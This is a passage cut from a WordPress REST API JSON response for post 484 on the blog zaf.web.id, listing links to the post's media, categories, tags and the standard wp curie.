/media?parent=484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/categories?post=484"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/tags?post=484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}